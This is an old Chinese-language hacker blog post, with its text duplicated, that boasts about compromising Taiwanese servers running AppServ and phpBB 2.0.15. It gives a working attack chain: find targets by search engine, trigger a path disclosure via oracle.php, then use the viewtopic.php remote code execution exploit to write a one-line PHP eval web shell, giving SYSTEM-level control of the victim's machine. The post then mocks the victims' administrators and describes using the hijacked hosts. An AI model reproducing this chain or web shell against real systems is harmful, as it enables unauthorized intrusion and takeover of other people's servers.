2005-12-17 12:40:50 by: h4x0r
去.tw"抓鸡"
偶一向不在国内找肉鸡 除非管理员大叔bt 上Q骂了我 嘿嘿 也就是要他了首面 不然那就上xx ^_^
最近phpbb不是 最近是一直被n多人关注着 哈哈 到v2.0.15还是被人黑灭 跟以前的serv-u一个样子
被xx的版本更新的很快。md 都说tw的管理员大叔比国内的尽业 其实也是想对而言的 也就是国内的大叔叔 爱在服务器上放点xx movie罢了 不知道大家知道这个软件不? appserv 配置php mysql 等的傻瓜性的软件
在tw被人大量使用 可以baidu下 这样一来得到一个webshell就是admin的权限 因为傻瓜软件中配置的apache的权限是system的级别 :) 就拿phpbb来说吧 最近不是有个 bug
phpBB 2.0.15 viewtopic.php Remote PHP Code Execution Exploit 得到一个tw的肉鸡太容易的说
baidu一个站点 用/phpBB2/db/oracle.php 暴出物理路径 如下
Fatal error: Cannot redeclare sql_nextid() in c:\appserv\www\phpbb2\db\oracle.php on line 405
然后用phpbb的 viewtopic.php Remote PHP Code Execution Exploit 写下面的句子 嘿嘿
echo ^<?php eval^($_POST[h4x0r]^);?^> > c:\appserv\www\phpbbs\db\ab.php
然后写如大马马 哈哈 很easy就搞定了 一个admin的肉鸡 去tw的肉鸡上申请qq 很容易申请的哦
如果遇到非win的机器 webshell 的权限可能很小 什么也做不了 其实webshell在非win的机器上没什么大的作为 除非管理员大叔叔弱智^_^
作者:不是我
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=381
最近phpbb不是 最近是一直被n多人关注着 哈哈 到v2.0.15还是被人黑灭 跟以前的serv-u一个样子
被xx的版本更新的很快。md 都说tw的管理员大叔比国内的尽业 其实也是想对而言的 也就是国内的大叔叔 爱在服务器上放点xx movie罢了 不知道大家知道这个软件不? appserv 配置php mysql 等的傻瓜性的软件
在tw被人大量使用 可以baidu下 这样一来得到一个webshell就是admin的权限 因为傻瓜软件中配置的apache的权限是system的级别 :) 就拿phpbb来说吧 最近不是有个 bug
phpBB 2.0.15 viewtopic.php Remote PHP Code Execution Exploit 得到一个tw的肉鸡太容易的说
baidu一个站点 用/phpBB2/db/oracle.php 暴出物理路径 如下
Fatal error: Cannot redeclare sql_nextid() in c:\appserv\www\phpbb2\db\oracle.php on line 405
然后用phpbb的 viewtopic.php Remote PHP Code Execution Exploit 写下面的句子 嘿嘿
echo ^<?php eval^($_POST[h4x0r]^);?^> > c:\appserv\www\phpbbs\db\ab.php
然后写如大马马 哈哈 很easy就搞定了 一个admin的肉鸡 去tw的肉鸡上申请qq 很容易申请的哦
如果遇到非win的机器 webshell 的权限可能很小 什么也做不了 其实webshell在非win的机器上没什么大的作为 除非管理员大叔叔弱智^_^
作者:不是我
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=381
There is no comment on this article.
